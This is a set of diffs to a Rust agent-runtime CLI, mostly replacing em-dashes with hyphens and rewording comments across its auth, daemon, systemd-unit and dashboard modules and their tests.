 /// Returns an empty vec for empty input (the caller emits nothing rather than a
-/// zero-length chunk). The common case — output well under one frame — returns a
+/// zero-length chunk). The common case - output well under one frame - returns a
 /// single slice.
 pub fn split_chunks(text: &str) -> Vec<&str> {
     let mut chunks = Vec::new();

--- a/crates/leviath-cli/src/commands/auth.rs
+++ b/crates/leviath-cli/src/commands/auth.rs
@@ -1,4 +1,4 @@
-//! `lev auth` — inspect and move the secrets Leviath holds.
+//! `lev auth` - inspect and move the secrets Leviath holds.
 //!
 //! Leviath keeps two kinds of long-lived secret: provider API keys and MCP OAuth
 //! grants. `[security] credential_store` decides whether they live in Leviath's
@@ -175,7 +175,7 @@ fn providers_in_file(path: &std::path::Path) -> Vec<String> {
 /// Whether the parsed config file carries a key for `provider`.
 ///
 /// `openrouter_api_key` sits at the top level while the other three live under
-/// `[providers]` — a historical split the config struct still reflects.
+/// `[providers]` - a historical split the config struct still reflects.
 fn file_has_key(value: &toml::Table, provider: &str) -> bool {
     let field = format!("{provider}_api_key");
     if provider == "openrouter" {
@@ -327,7 +327,7 @@ fn apply_migration(config: &Config, path: &std::path::Path, to_file: bool) -> an
     )
 }
 
-/// Core of [`apply_migration`] with the keychain already resolved — see
+/// Core of [`apply_migration`] with the keychain already resolved - see
 /// [`status_with`] for why the resolution is the caller's.
 fn apply_migration_with(
     config: &Config,
@@ -764,7 +764,7 @@ mod tests {
         set_readonly(&path, false);
     }
 
-    /// `Ok(None)` -- the file backend where a keychain was expected -- is a
+    /// `Ok(None)` - the file backend where a keychain was expected - is a
     /// refusal, not a silent no-op that would strip the file.
     #[test]
     fn migrating_to_a_backend_that_is_not_a_store_is_refused() {
@@ -990,7 +990,7 @@ mod tests {
         assert!(restored.contains("rt-SECRET"), "{restored}");
     }
 
-    /// Nothing to move is not an error -- a user who has never run
+    /// Nothing to move is not an error - a user who has never run
     /// `lev mcp login` has no store, and no home is not a failure either.
     #[test]
     fn migrating_mcp_grants_is_a_no_op_when_there_is_nothing_to_move() {
@@ -1037,7 +1037,7 @@ mod tests {
     }
 
     /// A config file that cannot be parsed must fail the command rather than
-    /// being treated as an empty install -- both entry points read it.
+    /// being treated as an empty install - both entry points read it.
     #[test]
     fn a_broken_config_file_fails_both_subcommands() {
         let _guard = with_mock_store();
@@ -1061,7 +1061,7 @@ mod tests {
     fn migrate_reports_a_failing_store() {
         let _guard = test_store::lock();
         // No store installed: `store_for` probes, and on a machine with a real
-        // keychain that would reach it -- so drive the seam directly instead.
+        // keychain that would reach it - so drive the seam directly instead.
         let dir = tempfile::tempdir().unwrap();
         let path = dir.path().join("config.toml");
         let config = config_with_keys(CredentialStoreKind::File);
@@ -1094,7 +1094,7 @@ mod tests {
         );
     }
 
-    /// Drive `execute` -- the real entry point -- for each subcommand, against a
+    /// Drive `execute` - the real entry point - for each subcommand, against a
     /// config path of our choosing.
     ///
     /// Plain `#[test]`s driving their own runtime rather than `#[tokio::test]`:

--- a/crates/leviath-cli/src/commands/context.rs
+++ b/crates/leviath-cli/src/commands/context.rs
@@ -1,8 +1,8 @@
-//! `lev context <run-id>` — show a run's context-window history.
+//! `lev context <run-id>` - show a run's context-window history.
 //!
 //! Replays the run's portable archive (`run.lvr`) into the sequence of context
 //! windows over time (one per recorded checkpoint/step) and prints them, so you
-//! can inspect what the agent's memory looked like at each stage and point —
+//! can inspect what the agent's memory looked like at each stage and point -
 //! for debugging or auditing. Read-only; sources everything from disk.
 
 use clap::Args;
@@ -63,7 +63,7 @@ fn render(run_id: &str, history: &[RunPoint], json: bool, full: bool) -> String 
         ));
         for region in &point.context.regions {
             out.push_str(&format!(
-                "      region {} ({}) — {} tok, {} entr{}\n",
+                "      region {} ({}) - {} tok, {} entr{}\n",
                 region.name,
                 region.kind,
                 region.current_tokens,

--- a/crates/leviath-cli/src/commands/create.rs
+++ b/crates/leviath-cli/src/commands/create.rs
@@ -20,7 +20,7 @@ pub async fn execute(args: CreateArgs) -> anyhow::Result<()> {
 }
 
 /// Core of `execute()`, parameterized over the file-write primitive so tests
-/// can force any individual write's error arm deterministically -- without a
+/// can force any individual write's error arm deterministically - without a
 /// process-global umask mutation (which is rejected here, for good reason:
 /// `cargo test`'s default thread-based parallelism means a restrictive umask
 /// can't be scoped to one test the way an env var or CWD lock can, so ANY
@@ -136,7 +136,7 @@ list_dir = "codebase"
 
 # Region budgets are percentages of the model's context window (ceilings, may sum
 # past 100%); the absolute max_tokens is an optional guard-rail cap. Every
-# blueprint needs an explicit `conversation` sliding_window — it holds the message
+# blueprint needs an explicit `conversation` sliding_window - it holds the message
 # stream and is carried across stage transitions.
 [context.regions]
 task         = {{ kind = "pinned",          budget = "2%",  max_tokens = 2000, required = true, seed = "task", required_message = "Describe the coding task via --task." }}
@@ -170,7 +170,7 @@ for local material and bash for anything else; raw content lands in `sources`.
 Note where each item came from and the claims it supports.
 """
 # (Tip: drop web_search.rhai / web_fetch.rhai into a `tools/` dir beside this file
-# and add them to available_tools for real web research — see the researcher agent.)
+# and add them to available_tools for real web research - see the researcher agent.)
 [stages.gather.tool_routing]
 default_region = "conversation"
 [stages.gather.tool_routing.overrides]
@@ -259,7 +259,7 @@ mod tests {
     fn name_with_windows_style_backslashes_produces_valid_toml() {
         // Regression test: `lev create` accepts a full path as the blueprint
         // name (used directly as the target directory), and on Windows that
-        // path contains backslashes -- e.g. `C:\Users\RUNNER~1\...\my-agent`.
+        // path contains backslashes - e.g. `C:\Users\RUNNER~1\...\my-agent`.
         // Before escaping, `\U` in the raw TOML string was parsed as the
         // start of an (invalid) 8-digit-hex unicode escape, breaking every
         // template. Confirmed this exact failure on real Windows CI.
@@ -330,7 +330,7 @@ mod tests {
             let regions = &bp.context_layout.regions;
 
             // Explicit conversation sliding_window. (matches! is the FIRST operand
-            // so it's evaluated for every region — non-sliding regions exercise its
+            // so it's evaluated for every region - non-sliding regions exercise its
             // false arm, the conversation region its true arm.)
             let has_conv_sliding = regions.iter().any(|r| {
                 matches!(r.kind, RegionKind::SlidingWindow { .. }) && r.name == "conversation"
@@ -439,7 +439,7 @@ mod tests {
 
     // ─── execute ─────────────────────────────────────────────────────────
     //
-    // `args.name` is used directly as a Path — passing an absolute tempdir
+    // `args.name` is used directly as a Path - passing an absolute tempdir
     // path makes this testable without touching the real CWD.
 
     #[tokio::test]
@@ -498,8 +498,8 @@ mod tests {
     #[tokio::test]
     async fn execute_create_dir_all_fails_when_ancestor_is_a_file() {
         // `blueprint_dir.exists()` (the early bail check) returns `false` for
-        // this path -- `Path::exists()` can't stat through a non-directory
-        // path component -- so execution reaches `fs::create_dir_all(...)?`,
+        // this path - `Path::exists()` can't stat through a non-directory
+        // path component - so execution reaches `fs::create_dir_all(...)?`,
         // which then genuinely fails (ancestor isn't a directory).
         let dir = tempfile::tempdir().unwrap();
         let blocking_file = dir.path().join("not-a-directory");
@@ -518,7 +518,7 @@ mod tests {
     // ─── execute_with: injected write-failure arms ─────────────────────────
     //
     // These exercise the 3 `write_file(...)?` error arms deterministically,
-    // without any process-global umask mutation -- each test injects a plain
+    // without any process-global umask mutation - each test injects a plain
     // local closure that fails for one specific target filename, leaving the
     // others to succeed exactly as production would.
 

--- a/crates/leviath-cli/src/commands/ctl.rs
+++ b/crates/leviath-cli/src/commands/ctl.rs
@@ -1,4 +1,4 @@
-//! `lev msg` / `lev cancel` — control operations on a running agent in the
+//! `lev msg` / `lev cancel` - control operations on a running agent in the
 //! shared-world daemon.
 //!
 //! Both send a control request over the daemon socket and report the boolean
@@ -34,7 +34,7 @@ pub struct CancelArgs {
     pub force: bool,
 }
 
-/// Arguments for `lev respond` — answer a pending `ask_user` interaction the
+/// Arguments for `lev respond` - answer a pending `ask_user` interaction the
 /// daemon is holding, or (with no `request_id`) list the open interactions.
 #[derive(clap::Args, Debug, Clone)]
 pub struct RespondArgs {
@@ -371,7 +371,7 @@ mod tests {
         assert!(r.unwrap_err().to_string().contains("unexpected"));
     }
 
-    /// `lev msg` has no on-disk fallback — an unreachable daemon is simply an
+    /// `lev msg` has no on-disk fallback - an unreachable daemon is simply an
     /// error, unlike `lev cancel`.
     #[tokio::test]
     async fn message_to_an_unreachable_daemon_is_an_error() {

--- a/crates/leviath-cli/src/commands/daemon.rs
+++ b/crates/leviath-cli/src/commands/daemon.rs
@@ -1,9 +1,9 @@
-//! `lev daemon` — run and manage the shared-world daemon.
+//! `lev daemon` - run and manage the shared-world daemon.
 //!
 //! With no action, `lev daemon` runs the daemon in the foreground: it binds the
 //! control socket, drives the one shared world, and (on restart) reloads any
-//! agents persisted under the runs directory. That execution — binding a real
-//! socket, spawning a detached process, polling for readiness — is real I/O
+//! agents persisted under the runs directory. That execution - binding a real
+//! socket, spawning a detached process, polling for readiness - is real I/O
 //! routed through [`crate::dispatch::RiskyExecutors`] and implemented by the
 //! binary (`main.rs`). This module defines the arguments plus the testable
 //! request/formatting cores the binary composes.
@@ -31,7 +31,7 @@ pub enum DaemonAction {
     Stop,
     /// Report whether the daemon is running and how many agents it hosts.
     Status,
-    /// Restart the daemon (stop, then start) — reloading persisted agents.
+    /// Restart the daemon (stop, then start) - reloading persisted agents.
     Restart,
     /// Register the daemon with the OS supervisor (launchd / systemd --user) so
     /// it starts at login and is restarted automatically if it ever dies.

--- a/crates/leviath-cli/src/commands/daemon_service.rs
+++ b/crates/leviath-cli/src/commands/daemon_service.rs
@@ -1,9 +1,9 @@
 //! `lev daemon install` / `lev daemon uninstall` - hand the daemon to the OS
 //! supervisor so it comes back by itself after a crash.
 //!
-//! Nothing restarted the daemon when it died (issue #109): a long-running agent
-//! simply stopped, and the next `lev run` was the only thing that would bring
-//! the daemon back. Registering a launchd agent (macOS) or a systemd *user*
+//! Without supervision, nothing restarts the daemon when it dies: a
+//! long-running agent simply stops, and the next `lev run` is the only thing
+//! that brings the daemon back. Registering a launchd agent (macOS) or a systemd *user*
 //! unit (Linux) with a restart policy closes that gap - and on the next start
 //! the daemon's own recovery pass reloads every interrupted run.
 //!

--- a/crates/leviath-cli/src/commands/daemon_service.rs
+++ b/crates/leviath-cli/src/commands/daemon_service.rs
@@ -1,10 +1,10 @@
-//! `lev daemon install` / `lev daemon uninstall` — hand the daemon to the OS
+//! `lev daemon install` / `lev daemon uninstall` - hand the daemon to the OS
 //! supervisor so it comes back by itself after a crash.
 //!
 //! Nothing restarted the daemon when it died (issue #109): a long-running agent
 //! simply stopped, and the next `lev run` was the only thing that would bring
 //! the daemon back. Registering a launchd agent (macOS) or a systemd *user*
-//! unit (Linux) with a restart policy closes that gap — and on the next start
+//! unit (Linux) with a restart policy closes that gap - and on the next start
 //! the daemon's own recovery pass reloads every interrupted run.
 //!
 //! This module is the tested core: rendering the unit file, resolving where it
@@ -76,7 +76,7 @@ pub fn config_home(user_home: &Path) -> Result<PathBuf> {
 }
 
 /// A launchd user agent that starts the daemon at login and restarts it
-/// whenever it exits — including the `abort()` this issue was about.
+/// whenever it exits - including the `abort()` this issue was about.
 #[cfg(target_os = "macos")]
 fn launchd_plist(exe: &Path, home: &Path, log: &Path) -> String {
     format!(
@@ -136,7 +136,7 @@ fn xml_escape(s: &str) -> String {
 // ── Linux: a systemd user unit ───────────────────────────────────────────────
 
 /// Build the service definition for this platform (see the macOS variant for
-/// the argument contract; `uid` is unused here — systemd's `--user` mode
+/// the argument contract; `uid` is unused here - systemd's `--user` mode
 /// already addresses the calling user's manager).
 #[cfg(target_os = "linux")]
 pub fn service_unit(exe: &Path, home: &Path, config_home: &Path, _uid: u32) -> Result<ServiceUnit> {
@@ -190,7 +190,7 @@ pub fn config_home(user_home: &Path) -> Result<PathBuf> {
 /// `pub` (in an already-public module) rather than private-plus-`allow(dead_code)`:
 /// on a non-Linux build nothing calls it, and suppressing the warning would be
 /// hiding the fact rather than stating it. It is genuinely part of this module's
-/// surface — the systemd renderer's input contract.
+/// surface - the systemd renderer's input contract.
 pub fn unit_safe(label: &str, value: &Path) -> Result<String> {
     let s = display(value);
     if s.contains('\n') || s.contains('\r') {
@@ -284,7 +284,7 @@ pub fn format_supervision(installed: bool, path: &Path) -> String {
     }
 }
 
-/// A path as a string, lossily — these are user home paths, valid UTF-8 in
+/// A path as a string, lossily - these are user home paths, valid UTF-8 in
 /// every case that matters, and a lossy rendering beats failing.
 ///
 /// Not gated to the platforms with a supervisor, even though only they build a
@@ -459,7 +459,7 @@ mod tests {
         /// through `systemd_unit` directly: this is the Linux-only call site,
         /// and `LEVIATH_HOME` is the value an attacker controls.
         ///
-        /// It needs its own test because the propagation only exists on Linux —
+        /// It needs its own test because the propagation only exists on Linux -
         /// on macOS this function is not compiled, so a macOS-only coverage run
         /// cannot see the arm at all. That is exactly how it was missed.
         #[test]
@@ -502,7 +502,7 @@ mod tests {
         /// interpolated path starts a new *directive*. `home` derives from
         /// `LEVIATH_HOME`, so this wrote an `ExecStartPre=` that then ran at
         /// every login. There is no general quoting for this position in
-        /// systemd, so the value is refused rather than escaped — and no
+        /// systemd, so the value is refused rather than escaped - and no
         /// legitimate path contains a newline.
         #[test]
         fn a_newline_in_an_interpolated_path_is_refused() {
@@ -527,7 +527,7 @@ mod tests {
             assert!(systemd_unit(good, good, evil).is_err(), "log");
         }
 
-        /// A carriage return is a line break too — systemd tolerates CRLF.
+        /// A carriage return is a line break too - systemd tolerates CRLF.
         #[test]
         fn a_carriage_return_is_refused_too() {
             assert!(

--- a/crates/leviath-cli/src/commands/dashboard/helpers.rs
+++ b/crates/leviath-cli/src/commands/dashboard/helpers.rs
@@ -5,7 +5,7 @@ use leviath_core::truncate_at_boundary;
 /// Format a Unix timestamp as a relative time string ("just now", "2m ago", "1h ago").
 pub(super) fn relative_time(ts: i64) -> String {
     if ts == 0 {
-        return "—".to_string();
+        return "-".to_string();
     }
     use std::time::{SystemTime, UNIX_EPOCH};
     let now = SystemTime::now()
@@ -59,7 +59,7 @@ pub(super) fn format_tokens(n: usize) -> String {
 /// Format elapsed seconds as a human-readable duration string.
 pub(super) fn elapsed_str(started_at: i64) -> String {
     if started_at == 0 {
-        return "—".to_string();
+        return "-".to_string();
     }
     use std::time::{SystemTime, UNIX_EPOCH};
     let now = SystemTime::now()
@@ -79,7 +79,7 @@ pub(super) fn elapsed_str(started_at: i64) -> String {
 /// Format elapsed seconds from `started_at` up to `until` (not current time).
 pub(super) fn elapsed_str_until(started_at: i64, until: i64) -> String {
     if started_at == 0 {
-        return "—".to_string();
+        return "-".to_string();
     }
     let secs = (until - started_at).max(0) as u64;
     if secs < 60 {
@@ -105,7 +105,7 @@ const NATIVE_CLIPBOARD_CMDS: &[(&str, &[&str])] = &[
 ///
 /// `pub` so the binary's `real_dashboard` can build the real dashboard
 /// clipboard fn as `|t| yank_to_clipboard_via(t, leviath_sys::osc52_yank)` and
-/// inject it — keeping the real `/dev/tty` write (which no unit test may
+/// inject it - keeping the real `/dev/tty` write (which no unit test may
 /// trigger) out of the coverage-measured library.
 pub fn yank_to_clipboard_via(text: &str, osc52_fallback: fn(&str) -> bool) -> bool {
     yank_to_clipboard_with(text, NATIVE_CLIPBOARD_CMDS, osc52_fallback)
@@ -124,7 +124,7 @@ fn yank_to_clipboard_with(
     use std::io::Write as IoWrite;
     use std::process::{Command, Stdio};
 
-    // Try native clipboard tools first — most reliable
+    // Try native clipboard tools first - most reliable
     for (cmd, args) in clipboard_cmds {
         if let Ok(mut child) = Command::new(cmd)
             .args(*args)
@@ -134,7 +134,7 @@ fn yank_to_clipboard_with(
             .spawn()
         {
             // `child.stdin` is guaranteed `Some` here because the child was
-            // spawned with `.stdin(Stdio::piped())` above -- an `if let`
+            // spawned with `.stdin(Stdio::piped())` above - an `if let`
             // guard would introduce an implicit "pattern didn't match" branch
             // that could never actually be exercised, since that invariant
             // always holds.
@@ -206,17 +206,17 @@ mod tests {
 
     #[test]
     fn test_relative_time_zero() {
-        assert_eq!(relative_time(0), "—");
+        assert_eq!(relative_time(0), "-");
     }
 
     #[test]
     fn test_elapsed_str_zero() {
-        assert_eq!(elapsed_str(0), "—");
+        assert_eq!(elapsed_str(0), "-");
     }
 
     #[test]
     fn test_elapsed_str_until_zero() {
-        assert_eq!(elapsed_str_until(0, 100), "—");
+        assert_eq!(elapsed_str_until(0, 100), "-");
     }
 
     #[test]
@@ -317,7 +317,7 @@ mod tests {
 
     #[test]
     fn test_elapsed_str_until_zero_start_returns_dash() {
-        assert_eq!(elapsed_str_until(0, 60), "—");
+        assert_eq!(elapsed_str_until(0, 60), "-");
     }
 
     // OSC52 encoding and the /dev/tty write path now live in `leviath_sys::tty`
@@ -466,7 +466,7 @@ mod tests {
 
     // Module-scoped (rather than nested inside the test below) so its body
     // can also be exercised directly by
-    // `test_unreachable_osc52_fallback_panics_if_ever_invoked` -- both
+    // `test_unreachable_osc52_fallback_panics_if_ever_invoked` - both
     // branches (never called vs. called-and-panics) need coverage, and the
     // test below can only ever prove the "never called" side.
     fn unreachable_osc52_fallback(_text: &str) -> bool {
@@ -507,7 +507,7 @@ mod tests {
         // success path (the `return true` inside the spawn loop) on every
         // platform, without depending on a real clipboard tool being installed.
         // This only *reads* `PATH` (to resolve `true`/`cmd`), so it takes
-        // temp-env's exclusive lock without changing any var -- serializing it
+        // temp-env's exclusive lock without changing any var - serializing it
         // against the PATH-starving tests so it never observes a starved PATH.
         let (cmd, args) = exit_cmd(true);
         let result = temp_env::with_vars_unset(Vec::<&str>::new(), || {
@@ -524,7 +524,7 @@ mod tests {
     fn test_yank_to_clipboard_native_tool_nonzero_exit_falls_through_to_fallback() {
         // A guaranteed-present command that exits non-zero makes
         // `child.wait().map(|s| s.success())` false, so the loop falls through
-        // to the OSC52 fallback -- the branch the success test doesn't reach.
+        // to the OSC52 fallback - the branch the success test doesn't reach.
         // Reads `PATH` only, so serialize via temp-env's lock without mutating.
         fn fallback_reached(_text: &str) -> bool {
             true
@@ -541,7 +541,7 @@ mod tests {
     //
     // Ambient-`PATH` smoke tests are avoided here: their nested fallback
     // closure only gets covered when a concurrently-running `PATH`-mutating
-    // test races with them -- nondeterministic, the exact kind of flakiness
+    // test races with them - nondeterministic, the exact kind of flakiness
     // this file's `PATH_ENV_LOCK`-guarded tests exist to avoid.
     // `yank_to_clipboard` itself (the public, un-suffixed wrapper) is
     // exercised for real by the dashboard's `key('y')` handler tests in
@@ -552,7 +552,7 @@ mod tests {
     #[test]
     fn test_yank_to_clipboard_falls_back_to_osc52_when_no_native_tool_on_path() {
         // Starve PATH so `Command::new("pbcopy"/"xclip"/"wl-copy").spawn()`
-        // fails with NotFound for all three -- the `if let Ok(mut child) = `
+        // fails with NotFound for all three - the `if let Ok(mut child) = `
         // guard is simply false each time (no external process is ever
         // launched), falling through to the OSC52 fallback. That fallback is
         // injected as a fn pointer that never touches the real TTY (unlike
@@ -567,7 +567,7 @@ mod tests {
             yank_to_clipboard_via("fallback path test content", fake_osc52_fallback)
         });
         // The point of this test is proving the native-tool loop was skipped
-        // entirely and control reached the injected OSC52 fallback -- not
+        // entirely and control reached the injected OSC52 fallback - not
         // exercising the real `osc52_yank_raw` (see its own tests above).
         assert!(result);
     }

--- a/crates/leviath-cli/src/commands/dashboard/input.rs
+++ b/crates/leviath-cli/src/commands/dashboard/input.rs
@@ -68,7 +68,7 @@ impl Dashboard {
                 return;
             }
 
-            // Detail view — not in input mode
+            // Detail view - not in input mode
             self.handle_detail_view_key(key_code);
             return;
         }
@@ -124,7 +124,7 @@ impl Dashboard {
 
     /// Whether the user is actively editing a document (an `EditText`
     /// interaction). When true the editable textarea is rendered inline in the
-    /// content pane — where the current text is shown — rather than in the bottom
+    /// content pane - where the current text is shown - rather than in the bottom
     /// input bar, so editing happens in place over the document being revised.
     pub(in crate::commands::dashboard) fn editing_document(&self) -> bool {
         use interaction::InteractionKind;
@@ -135,7 +135,7 @@ impl Dashboard {
                 .is_some_and(|r| r.kind == InteractionKind::EditText)
     }
 
-    /// The document to review for the selected agent's pending interaction — the
+    /// The document to review for the selected agent's pending interaction - the
     /// current instance's plan/output, carried as the request `body`. Shown in
     /// the output pane in place of the full accumulated history. `None` while
     /// actively editing (the textarea takes the pane) or when there is no body.
@@ -156,7 +156,7 @@ impl Dashboard {
     /// This must mirror the condition the renderer uses, not merely ask whether
     /// a review body exists. The pane is suppressed in input mode (where the
     /// document is drawn in the content pane instead) and whenever the output
-    /// pane is already showing the same body — and in both of those cases a
+    /// pane is already showing the same body - and in both of those cases a
     /// scroll aimed at `review_scroll` moves a pane nobody can see. That is
     /// exactly what happened: with a plan open for approval, every scroll key
     /// updated state that was not being rendered, so the plan sat still.
@@ -169,7 +169,7 @@ impl Dashboard {
         !self.input_mode && !content_shows_body && self.has_scrollable_document()
     }
 
-    /// Whether there is a review document on screen *somewhere* — the review
+    /// Whether there is a review document on screen *somewhere* - the review
     /// pane or the content pane.
     ///
     /// "Is there anything to scroll", as distinct from
@@ -257,7 +257,7 @@ impl Dashboard {
                 }
                 // Up/Down move the selection here, so the document gets its own
                 // keys. Without these there was no way at all to read a plan
-                // longer than the pane while its approval prompt was open —
+                // longer than the pane while its approval prompt was open -
                 // which is exactly when you need to read it.
                 KeyCode::PageUp => self.scroll_by(10),
                 KeyCode::PageDown => self.scroll_by(-10),
@@ -344,7 +344,7 @@ impl Dashboard {
             KeyCode::Char('.') => self.step_context_history(1),
             KeyCode::Char('i') => {
                 // Respond to a pending interaction, or send a mid-run message to
-                // any active agent that accepts them — same key, same input area.
+                // any active agent that accepts them - same key, same input area.
                 if self.selected_stage_can_respond() || self.selected_agent_accepts_messages() {
                     self.input_mode = true;
                     self.choice_selected = 0;
@@ -453,7 +453,7 @@ impl Dashboard {
             // The index came from `display_indices`/`agents` just above, via the
             // `self.selected_agent()` lookup that got us into this branch, and
             // the `cmd_tx.send` in between does not mutate either collection or
-            // `self.selected` -- so it's always still valid. An `if let` guard
+            // `self.selected` - so it's always still valid. An `if let` guard
             // here would add an "index went stale" branch that can never
             // actually be exercised.
             let idx = self
@@ -607,7 +607,7 @@ impl Dashboard {
             let _ = self.cmd_tx.send(DaemonCommand::Cancel {
                 run_id: agent_id.clone(),
             });
-            // See the comment in `handle_kill_from_detail` -- the index is still
+            // See the comment in `handle_kill_from_detail` - the index is still
             // valid because the `cmd_tx.send` above does not touch
             // `display_indices`/`agents`/`selected`.
             let idx = self
@@ -632,7 +632,7 @@ impl Dashboard {
             let _ = self.cmd_tx.send(DaemonCommand::Cancel {
                 run_id: agent_id.clone(),
             });
-            // See the comment in `handle_kill_from_detail` -- the index is still
+            // See the comment in `handle_kill_from_detail` - the index is still
             // valid because the `cmd_tx.send` above does not touch
             // `display_indices`/`agents`/`selected`.
             let idx = self
@@ -674,7 +674,7 @@ impl Dashboard {
                     (InteractionResponse::text(&r.id, &input), d)
                 }
                 InteractionKind::EditText => {
-                    // Preserve indentation / internal newlines — only trim the
+                    // Preserve indentation / internal newlines - only trim the
                     // display label, not the submitted content.
                     let input = self.input_textarea.lines().join("\n");
                     let d = if input.trim().is_empty() {
@@ -743,7 +743,7 @@ impl Dashboard {
         // The index is still valid because nothing since the
         // `self.selected_agent()` lookup at the top of this function (which is
         // where `req`/`agent_id` came from) touches
-        // `display_indices`/`agents`/`selected` -- an `if let` guard here would
+        // `display_indices`/`agents`/`selected` - an `if let` guard here would
         // add an "index went stale" branch that can never actually be exercised.
         let idx = self
             .selected_agent_raw_idx()
@@ -1161,7 +1161,7 @@ mod tests {
     }
 
     /// Up/Down move the choice selection, so before this there was no key at
-    /// all that scrolled the document — a plan longer than the pane could not
+    /// all that scrolled the document - a plan longer than the pane could not
     /// be read while its approval prompt was open, which is the only time it is
     /// shown.
     #[test]
@@ -1169,8 +1169,8 @@ mod tests {
         let mut dash = dashboard_awaiting_a_plan();
         assert_eq!(dash.detail_scroll, 0);
 
-        // In input mode the plan is drawn in the content pane — the separate
-        // review pane is suppressed — so that is what has to move. Verified
+        // In input mode the plan is drawn in the content pane - the separate
+        // review pane is suppressed - so that is what has to move. Verified
         // against the real dashboard through a pty: the pane's own position
         // readout went 100% → 91% → 81% on two PageUps.
         dash.handle_key(key(KeyCode::PageUp));
@@ -1179,7 +1179,7 @@ mod tests {
         dash.handle_key(key(KeyCode::PageDown));
         assert_eq!(dash.detail_scroll, 0, "and PageDown comes back");
 
-        // Down still selects rather than scrolling — the plan keys were added
+        // Down still selects rather than scrolling - the plan keys were added
         // beside the choice keys, not on top of them.
         dash.choice_selected = 0;
         dash.handle_key(key(KeyCode::Down));
@@ -1253,7 +1253,7 @@ mod tests {
         assert_eq!(dash.detail_scroll, 0);
 
         // Out of input mode and with the content pane on logs, the review pane
-        // is what is rendered — and so what the wheel moves.
+        // is what is rendered - and so what the wheel moves.
         dash.input_mode = false;
         dash.handle_key(key(KeyCode::Char('l')));
         dash.scroll_by(3);
@@ -1386,7 +1386,7 @@ mod tests {
         // Entering input mode over an EditText ⇒ editing inline.
         dash.input_mode = true;
         assert!(dash.editing_document());
-        // While editing, the textarea owns the pane — no separate review body.
+        // While editing, the textarea owns the pane - no separate review body.
         assert!(dash.reviewing_body().is_none());
     }
 
@@ -1507,7 +1507,7 @@ mod tests {
 
     #[test]
     fn input_mode_no_pending_request_typing_appends_to_textarea() {
-        // kind resolves to None when there's no pending_request at all —
+        // kind resolves to None when there's no pending_request at all -
         // exercises the `Some(FreeText) | None` arm's None side.
         let mut dash = make_test_dashboard();
         let agent = make_test_agent("run-1", AgentDisplayStatus::Active);
@@ -1569,8 +1569,8 @@ mod tests {
     }
 
     /// Every state that is not a finished one can be killed. The gate used to be
-    /// `Active | Waiting`, so a run showing IDLE or STALE — exactly the states a
-    /// user reaches for the kill key in — could not be killed at all.
+    /// `Active | Waiting`, so a run showing IDLE or STALE - exactly the states a
+    /// user reaches for the kill key in - could not be killed at all.
     #[test]
     fn every_unfinished_state_can_be_killed() {
         for status in [
@@ -1712,7 +1712,7 @@ mod tests {
     #[test]
     fn cancel_from_list_no_agent_selected_is_noop() {
         let mut dash = make_test_dashboard();
-        // No agents at all — selected_agent() is None.
+        // No agents at all - selected_agent() is None.
         dash.handle_key(key(KeyCode::Char('c')));
         assert!(dash.agents.is_empty());
     }
@@ -1747,7 +1747,7 @@ mod tests {
     fn submit_input_no_agent_selected_returns_early() {
         let mut dash = make_test_dashboard();
         dash.input_mode = true;
-        // No agents at all — selected_agent() is None.
+        // No agents at all - selected_agent() is None.
         dash.submit_input();
         assert!(dash.agents.is_empty());
     }
@@ -1953,7 +1953,7 @@ mod tests {
         // In the default Output mode the content pane is already showing the
         // body, so the separate review pane is suppressed and the content pane
         // is what a scroll must move. This test used to assert `review_scroll`
-        // here — a pane that is not on screen — which is precisely why a plan
+        // here - a pane that is not on screen - which is precisely why a plan
         // sat still while every scroll key "worked".
         dash.handle_key(key(KeyCode::Up));
         assert_eq!(dash.detail_scroll, 1);
@@ -2632,7 +2632,7 @@ mod tests {
         dash.selected_stage = 0;
         dash.detail_scroll = 10;
         dash.review_scroll = 5;
-        // search_mode must be FALSE — in search mode, Char('3') is treated as a
+        // search_mode must be FALSE - in search mode, Char('3') is treated as a
         // search character rather than a stage-jump key.
         dash.search_mode = false;
         dash.search_query = "xyz".to_string();
@@ -2680,7 +2680,7 @@ mod tests {
 
     #[test]
     fn detail_view_comma_and_period_route_to_history_step() {
-        // With no archive on disk, stepping is a no-op — this exercises the
+        // With no archive on disk, stepping is a no-op - this exercises the
         // `,`/`.` routing arms without needing a run.lvr fixture.
         let mut dash = make_test_dashboard();
         dash.agents.push(make_test_agent(
@@ -2759,7 +2759,7 @@ mod tests {
         assert!(dash.toasts.is_empty());
     }
 
-    // ─── main list: Down key — three agents to confirm can-move path ──────
+    // ─── main list: Down key - three agents to confirm can-move path ──────
 
     #[test]
     fn main_list_down_advances_through_multiple_agents() {
@@ -2781,7 +2781,7 @@ mod tests {
         dash.handle_key(key(KeyCode::Down));
         assert_eq!(dash.selected, 2);
 
-        // At bottom — cannot go further
+        // At bottom - cannot go further
         dash.handle_key(key(KeyCode::Down));
         assert_eq!(dash.selected, 2);
     }

--- a/crates/leviath-cli/src/commands/dashboard/input.rs
+++ b/crates/leviath-cli/src/commands/dashboard/input.rs
@@ -352,9 +352,9 @@ impl Dashboard {
                 }
             }
             // All four go through `scroll_by`, which is the one place that
-            // decides which pane a gesture moves. They used to carry their own
-            // copy of that decision, which is how the keyboard and the renderer
-            // came to disagree about where the document was.
+            // decides which pane a gesture moves. Each carrying its own copy of
+            // that decision is how the keyboard and the renderer come to
+            // disagree about where the document is.
             KeyCode::Up => self.scroll_by(1),
             KeyCode::Down => self.scroll_by(-1),
             KeyCode::PageUp => self.scroll_by(10),
@@ -1160,9 +1160,9 @@ mod tests {
         dash
     }
 
-    /// Up/Down move the choice selection, so before this there was no key at
-    /// all that scrolled the document - a plan longer than the pane could not
-    /// be read while its approval prompt was open, which is the only time it is
+    /// Up/Down move the choice selection, so PageUp/PageDown/Home/End must
+    /// scroll the document - without them a plan longer than the pane cannot
+    /// be read while its approval prompt is open, which is the only time it is
     /// shown.
     #[test]
     fn a_plan_can_be_scrolled_while_its_approval_prompt_is_open() {
@@ -1568,9 +1568,9 @@ mod tests {
         assert_complete(&dash.agents[0].status);
     }
 
-    /// Every state that is not a finished one can be killed. The gate used to be
-    /// `Active | Waiting`, so a run showing IDLE or STALE - exactly the states a
-    /// user reaches for the kill key in - could not be killed at all.
+    /// Every state that is not a finished one can be killed. A gate of only
+    /// `Active | Waiting` would make a run showing IDLE or STALE - exactly the
+    /// states a user reaches for the kill key in - unkillable.
     #[test]
     fn every_unfinished_state_can_be_killed() {
         for status in [
@@ -1952,9 +1952,9 @@ mod tests {
 
         // In the default Output mode the content pane is already showing the
         // body, so the separate review pane is suppressed and the content pane
-        // is what a scroll must move. This test used to assert `review_scroll`
